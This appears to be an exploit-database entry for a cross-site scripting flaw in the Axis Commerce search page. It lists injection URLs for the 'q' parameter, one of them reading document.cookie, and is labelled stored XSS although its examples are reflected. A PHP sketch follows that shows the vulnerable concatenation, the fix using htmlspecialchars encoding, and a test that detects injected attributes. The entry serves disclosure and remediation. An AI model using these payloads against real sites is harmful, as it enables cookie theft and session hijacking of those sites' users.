0day Today Exploits Market and 0day Exploits Database

Axis Commerce (E-Commerce System) Stored XSS

Author: Eyup CELIK
Risk: [ Security Risk Unsorted ]
0day-ID: 0day-ID-16728
Category: web applications
Date added: 20-08-2011
Platform: php
# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previous
# Tested on: Apache (For Windows)
 
ISSUE
 
Vulnerable Modules => Search Module
 
XSS can be triggered through the search input (the q parameter), as the examples below show
 
Example Code: " onmouseover=prompt(XSS Code) bad="
 
Example:
 
http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="
 
http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="
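
Mitigation sketch, added here as an example and not taken from the Axis Commerce source: a search value echoed into a quoted HTML attribute, first unencoded and then encoded with htmlspecialchars(), with the resulting markup parsed to list which attributes end up on the element. The template and the function names renderSearchBoxUnsafe, renderSearchBox and inputAttributes are hypothetical, and the assumption that q lands in an input's value attribute is inferred from the payload shape above.

```php
<?php
// Added example: hypothetical search-box template, not Axis Commerce code.

// Vulnerable pattern: the request value is concatenated into a quoted attribute.
function renderSearchBoxUnsafe(string $q): string
{
    return '<input type="text" name="q" value="' . $q . '">';
}

// Hardened pattern: encode for the HTML attribute context before output.
// ENT_QUOTES encodes both quote characters; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function renderSearchBox(string $q): string
{
    $encoded = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="q" value="' . $encoded . '">';
}

// Parse the markup with an HTML parser and return the attribute names found
// on the first <input> element, so injected attributes become visible.
function inputAttributes(string $html): array
{
    libxml_use_internal_errors(true); // malformed markup is expected here
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();

    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            $names[] = $attr->nodeName;
        }
    }
    return $names;
}

// Constructed input: the advisory's "Example Code" shape with the numeric
// marker from its first example URL.
$q = '" onmouseover=prompt(906764) bad="';

echo "unencoded: ", implode(', ', inputAttributes(renderSearchBoxUnsafe($q))), PHP_EOL;
echo "encoded:   ", implode(', ', inputAttributes(renderSearchBox($q))), PHP_EOL;
```

Any attribute listed beyond type, name and value came from the request, which is the condition a regression test for the search template should assert against.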



#  0day.today [2024-12-25]  #